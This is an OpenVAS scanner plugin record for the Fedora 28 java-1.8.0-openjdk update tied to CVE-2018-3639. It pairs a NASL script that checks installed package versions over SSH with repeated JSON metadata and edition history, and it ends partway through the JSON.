Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d
2019-02-25T00:00:00
ID OPENVAS:1361412562310875475 Type openvas Reporter Copyright (C) 2019 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the
# Copyright (C) 2019 Greenbone Networks GmbH
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (C) the respective author(s)
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.875475");
script_version("$Revision: 14223 $");
script_cve_id("CVE-2018-3639");
script_tag(name:"cvss_base", value:"4.9");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:N/A:N");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2019-02-25 04:12:13 +0100 (Mon, 25 Feb 2019)");
script_name("Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2019 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC28");
script_xref(name:"FEDORA", value:"2019-3f9a71578d");
script_xref(name:"URL", value:"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q");
script_tag(name:"summary", value:"The remote host is missing an update for the 'java-1.8.0-openjdk'
package(s) announced via the FEDORA-2019-3f9a71578d advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable package version is present on the target host.");
script_tag(name:"affected", value:"java-1.8.0-openjdk on Fedora 28.");
script_tag(name:"solution", value:"Please install the updated package(s).");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"package");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "FC28")
{
if ((res = isrpmvuln(pkg:"java", rpm:"java~1.8.0~openjdk~1.8.0.201.b09~2.fc28", rls:"FC28")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310875475", "bulletinFamily": "scanner", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d", "description": "The remote host is missing an update for the ", "published": "2019-02-25T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875475", "reporter": "Copyright (C) 2019 Greenbone Networks GmbH", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q", "2019-3f9a71578d"], "cvelist": ["CVE-2018-3639"], "type": "openvas", "lastseen": "2019-05-29T18:32:13", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2018-3639"], "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is missing an update for the ", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-02-27T13:35:20", "references": [{"idList": ["ORACLELINUX_ELSA-2018-1649.NASL", "ORACLELINUX_ELSA-2018-1650.NASL", "SL_20180521_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "REDHAT-RHSA-2018-1640.NASL", "CENTOS_RHSA-2018-2001.NASL", "CENTOS_RHSA-2018-1633.NASL", "SUSE_SU-2018-1475-1.NASL", "AIX_IJ05826.NASL", "AIX_IJ05824.NASL", "REDHAT-RHSA-2018-1636.NASL"], "type": "nessus"}, {"idList": ["ELSA-2018-2001", "ELSA-2018-1997"], "type": "oraclelinux"}, {"idList": ["OPENVAS:1361412562310874719", "OPENVAS:1361412562310882882", "OPENVAS:1361412562310882880", "OPENVAS:1361412562310851999", "OPENVAS:1361412562310882883", "OPENVAS:1361412562310843558", "OPENVAS:1361412562310882887", "OPENVAS:1361412562310874720", "OPENVAS:1361412562310843533"], "type": "openvas"}, {"idList": ["RHSA-2018:1674", "RHSA-2018:3401", "RHSA-2018:1669", "RHSA-2018:1646", "RHSA-2018:1826", "RHSA-2018:1649", "RHSA-2018:1667", "RHSA-2018:2309", "RHSA-2018:1651", "RHSA-2018:1663"], "type": "redhat"}, {"idList": ["SSA-2018-208-01"], "type": "slackware"}, {"idList": ["USN-3651-1", "USN-3679-1"], "type": "ubuntu"}, {"idList": ["OPENSUSE-SU-2018:2306-1"], "type": "suse"}, {"idList": ["CVE-2018-3639"], "type": "cve"}, {"idList": ["CESA-2018:1629", "CESA-2018:1649", "CESA-2018:1632", "CESA-2018:1633", "CESA-2018:1647"], "type": "centos"}, {"idList": ["ALAS-2018-1039"], "type": "amazon"}, {"idList": ["F5:K29146534"], "type": "f5"}, {"idList": ["DEBIAN:DSA-4210-1:DBC01"], "type": "debian"}]}, "score": {"modified": "2019-02-27T13:35:20", "value": 5.7, "vector": "NONE"}}, "hash": "b756e24dfe698e41a75973eae080114f8f2582f3224e1ddc06edf3ffca35b57a", "hashmap": [{"hash": "4118b2544f934fee01d7873fbe86694e", "key": "sourceData"}, {"hash": "46c852ca3f594e5aa5d86bf8f3a3df9b", "key": "pluginID"}, {"hash": "da261cfabf11692e45975539cd871f20", "key": "references"}, {"hash": "1693b96dcccf4fbcd463bf8baaa2bf3f", "key": "description"}, {"hash": "90e0a4298a6e0557d4a1dece395ab3a6", "key": "href"}, {"hash": "6a8535d82bf6ddc9c58387bdec1620fb", "key": "modified"}, {"hash": "fee81191cd8e6292a91a97504373d195", "key": "cvss"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "4881e51df65ac9b43d0b456fe09b3fb1", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b00d9fec700a3f1025a0238f1ec981df", "key": "published"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fafa525df3c894f9f6f0818f860830db", "key": "title"}, {"hash": "b57f98c9cb5050d798f0228e05c5938f", "key": "cvelist"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875475", "id": "OPENVAS:1361412562310875475", "lastseen": "2019-02-27T13:35:20", "modified": "2019-02-26T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310875475", "published": "2019-02-25T00:00:00", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q", "2019-3f9a71578d"], "reporter": "Copyright (C) 2019 Greenbone Networks GmbH", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875475\");\n script_version(\"$Revision: 13881 $\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-26 14:01:46 +0100 (Tue, 26 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-25 04:12:13 +0100 (Mon, 25 Feb 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f9a71578d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-3f9a71578d advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The OpenJDK runtime environment 8.\n\");\n\n script_tag(name:\"affected\", value:\"java-1.8.0-openjdk on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.201.b09~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2019-02-27T13:35:20"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2018-3639"], "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is missing an update for the ", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-02-28T15:34:49", "references": [{"idList": ["OPENVAS:1361412562310882882", "OPENVAS:1361412562310882880", "OPENVAS:1361412562310851999", "OPENVAS:1361412562310882883", "OPENVAS:1361412562310843558", "OPENVAS:1361412562310882887", "OPENVAS:1361412562310874720", "OPENVAS:1361412562310843533"], "type": "openvas"}, {"idList": ["REDHAT-RHSA-2018-1667.NASL", "SLACKWARE_SSA_2018-208-01.NASL", "FEDORA_2018-DB0D3E157E.NASL", "REDHAT-RHSA-2018-2250.NASL", "REDHAT-RHSA-2018-1660.NASL", "REDHAT-RHSA-2018-1630.NASL", "SL_20180522_KERNEL_ON_SL7_X.NASL", "REDHAT-RHSA-2018-1632.NASL", "REDHAT-RHSA-2018-3397.NASL", "CENTOS_RHSA-2018-1629.NASL"], "type": "nessus"}, {"idList": ["ELSA-2018-1997"], "type": "oraclelinux"}, {"idList": ["RHSA-2018:1675", "RHSA-2018:1661", "RHSA-2018:1633", "RHSA-2018:1629", "RHSA-2018:1654", "RHSA-2018:1662", "RHSA-2018:2250", "RHSA-2018:1630", "RHSA-2018:1997", "RHSA-2018:1639"], "type": "redhat"}, {"idList": ["SSA-2018-208-01"], "type": "slackware"}, {"idList": ["ALAS-2018-1037"], "type": "amazon"}, {"idList": ["CESA-2018:1997", "CESA-2018:1629", "CESA-2018:1649", "CESA-2018:1632", "CESA-2018:1633", "CESA-2018:1647"], "type": "centos"}, {"idList": ["OPENSUSE-SU-2018:2306-1"], "type": "suse"}, {"idList": ["CVE-2018-3639"], "type": "cve"}, {"idList": ["F5:K29146534"], "type": "f5"}, {"idList": ["DEBIAN:DSA-4210-1:DBC01"], "type": "debian"}, {"idList": ["USN-3651-1"], "type": "ubuntu"}]}, "score": {"modified": "2019-02-28T15:34:49", "value": 5.7, "vector": "NONE"}}, "hash": "2b1c83b44fc63ce9b435add971b4fa4469dfb1a9565cbebcc509a27576bdfa26", "hashmap": [{"hash": "46c852ca3f594e5aa5d86bf8f3a3df9b", "key": "pluginID"}, {"hash": "371c890b8b533065da35dcb16932000a", "key": "sourceData"}, {"hash": "da261cfabf11692e45975539cd871f20", "key": "references"}, {"hash": "1693b96dcccf4fbcd463bf8baaa2bf3f", "key": "description"}, {"hash": "e463107ccc3b7db9e89d46b626d980a7", "key": "modified"}, {"hash": "90e0a4298a6e0557d4a1dece395ab3a6", "key": "href"}, {"hash": "fee81191cd8e6292a91a97504373d195", "key": "cvss"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "4881e51df65ac9b43d0b456fe09b3fb1", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b00d9fec700a3f1025a0238f1ec981df", "key": "published"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fafa525df3c894f9f6f0818f860830db", "key": "title"}, {"hash": "b57f98c9cb5050d798f0228e05c5938f", "key": "cvelist"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875475", "id": "OPENVAS:1361412562310875475", "lastseen": "2019-02-28T15:34:49", "modified": "2019-02-27T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310875475", "published": "2019-02-25T00:00:00", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q", "2019-3f9a71578d"], "reporter": "Copyright (C) 2019 Greenbone Networks GmbH", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875475\");\n script_version(\"$Revision: 13913 $\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-27 17:43:39 +0100 (Wed, 27 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-25 04:12:13 +0100 (Mon, 25 Feb 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f9a71578d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-3f9a71578d advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The OpenJDK runtime environment 8.\n\");\n\n script_tag(name:\"affected\", value:\"java-1.8.0-openjdk on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.201.b09~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2019-02-28T15:34:49"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2018-3639"], "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is missing an update for the ", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-03-18T14:21:09", "references": [{"idList": ["CESA-2018:1669", "CESA-2018:1629", "CESA-2018:2001", "CESA-2018:1633", "CESA-2018:1660"], "type": "centos"}, {"idList": ["ALAS-2018-1039", "ALAS-2018-1037"], "type": "amazon"}, {"idList": ["RHSA-2018:3396", "RHSA-2018:1633", "RHSA-2018:1641", "RHSA-2018:1649", "RHSA-2018:3423", "RHSA-2018:2001", "RHSA-2018:1667", "RHSA-2018:1664", "RHSA-2018:1645", "RHSA-2018:1663"], "type": "redhat"}, {"idList": ["ELSA-2018-1649", "ELSA-2018-2001", "ELSA-2018-1660"], "type": "oraclelinux"}, {"idList": ["OPENSUSE-SU-2018:1380-1"], "type": "suse"}, {"idList": ["THREATPOST:F646E92307240E4B7D00CC0FC73BCE0D"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310874719", "OPENVAS:1361412562310876143", "OPENVAS:1361412562310851854", "OPENVAS:1361412562310843799", "OPENVAS:1361412562310882890", "OPENVAS:1361412562310843558", "OPENVAS:1361412562310852029", "OPENVAS:1361412562310704210"], "type": "openvas"}, {"idList": ["SUSE_SU-2018-1377-1.NASL", "SUSE_SU-2018-1362-2.NASL", "CENTOS_RHSA-2018-1632.NASL", "REDHAT-RHSA-2018-1651.NASL", "CENTOS_RHSA-2018-1660.NASL", "REDHAT-RHSA-2018-2060.NASL", "REDHAT-RHSA-2018-1639.NASL", "ORACLELINUX_ELSA-2018-1997.NASL", "EULEROS_SA-2018-1153.NASL", "REDHAT-RHSA-2018-3424.NASL"], "type": "nessus"}, {"idList": ["KLA11030"], "type": "kaspersky"}, {"idList": ["CVE-2018-3639"], "type": "cve"}, {"idList": ["F5:K29146534"], "type": "f5"}]}, "score": {"modified": "2019-03-18T14:21:09", "value": 5.7, "vector": "NONE"}}, "hash": "546b50ae780f5a30c9aee34efaf139ffae3331dee7265b23d6311de3a731b5e2", "hashmap": [{"hash": "46c852ca3f594e5aa5d86bf8f3a3df9b", "key": "pluginID"}, {"hash": "da261cfabf11692e45975539cd871f20", "key": "references"}, {"hash": "1693b96dcccf4fbcd463bf8baaa2bf3f", "key": "description"}, {"hash": "90e0a4298a6e0557d4a1dece395ab3a6", "key": "href"}, {"hash": "55b47858bc5ef5b0f5022ace0c4a3b2e", "key": "sourceData"}, {"hash": "fee81191cd8e6292a91a97504373d195", "key": "cvss"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "4881e51df65ac9b43d0b456fe09b3fb1", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b00d9fec700a3f1025a0238f1ec981df", "key": "published"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "fafa525df3c894f9f6f0818f860830db", "key": "title"}, {"hash": "4525bc09d1c4c408a417a5eb7b850972", "key": "modified"}, {"hash": "b57f98c9cb5050d798f0228e05c5938f", "key": "cvelist"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875475", "id": "OPENVAS:1361412562310875475", "lastseen": "2019-03-18T14:21:09", "modified": "2019-03-15T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310875475", "published": "2019-02-25T00:00:00", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q", "2019-3f9a71578d"], "reporter": "Copyright (C) 2019 Greenbone Networks GmbH", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875475\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-25 04:12:13 +0100 (Mon, 25 Feb 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f9a71578d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-3f9a71578d advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"java-1.8.0-openjdk on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.201.b09~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2019-03-18T14:21:09"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "b57f98c9cb5050d798f0228e05c5938f"}, {"key": "cvss", "hash": "df57dc96862336703e85f66ebbecd67b"}, {"key": "description", "hash": "1693b96dcccf4fbcd463bf8baaa2bf3f"}, {"key": "href", "hash": "90e0a4298a6e0557d4a1dece395ab3a6"}, {"key": "modified", "hash": "4525bc09d1c4c408a417a5eb7b850972"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "46c852ca3f594e5aa5d86bf8f3a3df9b"}, {"key": "published", "hash": "b00d9fec700a3f1025a0238f1ec981df"}, {"key": "references", "hash": "da261cfabf11692e45975539cd871f20"}, {"key": "reporter", "hash": "4881e51df65ac9b43d0b456fe09b3fb1"}, {"key": "sourceData", "hash": "55b47858bc5ef5b0f5022ace0c4a3b2e"}, {"key": "title", "hash": "fafa525df3c894f9f6f0818f860830db"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "c0cd3b02f256edc73122b07fe53d300e26a75c6430229fd00b5e26855b94984f", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-3639"]}, {"type": "f5", "idList": ["F5:K29146534"]}, {"type": "symantec", "idList": ["SMNTC-104232"]}, {"type": "virtuozzo", "idList": ["VZA-2018-033", "VZA-2018-032", "VZA-2018-034", "VZA-2018-048", "VZA-2018-047"]}, {"type": "redhat", "idList": ["RHSA-2018:2328", "RHSA-2018:1675", "RHSA-2018:1647", "RHSA-2018:2171", "RHSA-2018:1674", "RHSA-2018:1659", "RHSA-2018:3397", "RHSA-2018:1636", "RHSA-2018:1666", "RHSA-2018:1997"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875869", "OPENVAS:1361412562310882914", "OPENVAS:1361412562310882882", "OPENVAS:1361412562310882917", "OPENVAS:1361412562310882886", "OPENVAS:1361412562310876935", "OPENVAS:1361412562310875589", "OPENVAS:1361412562310882885", "OPENVAS:1361412562310852087", "OPENVAS:1361412562310882883"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2018-1649.NASL", "REDHAT-RHSA-2018-3425.NASL", "REDHAT-RHSA-2018-1647.NASL", "SUSE_SU-2018-1378-1.NASL", "REDHAT-RHSA-2018-1638.NASL", "SL_20180522_QEMU_KVM_ON_SL7_X.NASL", "OPENSUSE-2019-398.NASL", "ORACLELINUX_ELSA-2018-1649.NASL", "AIX_IJ05826.NASL", "ORACLELINUX_ELSA-2018-1632.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-1650", "ELSA-2018-1997", "ELSA-2018-1669", "ELSA-2018-1632", "ELSA-2018-1648"]}, {"type": "exploitdb", "idList": ["EDB-ID:44695"]}, {"type": "centos", "idList": ["CESA-2018:1651", "CESA-2018:1649"]}, {"type": "kaspersky", "idList": ["KLA11253"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1628-1", "OPENSUSE-SU-2018:1621-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4210-1:DBC01"]}], "modified": "2019-05-29T18:32:13"}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-05-29T18:32:13"}, "vulnersScore": 7.7}, "objectVersion": "1.3", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875475\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-25 04:12:13 +0100 (Mon, 25 Feb 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-3f9a71578d\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-3f9a71578d\");\n script_xref(name:\"URL\", 